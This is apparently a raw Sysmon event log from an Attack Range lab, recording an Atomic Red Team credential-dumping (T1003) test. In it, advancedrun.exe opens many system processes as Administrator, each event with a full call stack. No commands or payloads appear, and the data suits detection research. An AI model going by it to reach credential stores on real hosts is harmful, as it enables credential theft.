atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951991Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951990Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.292{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951988Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
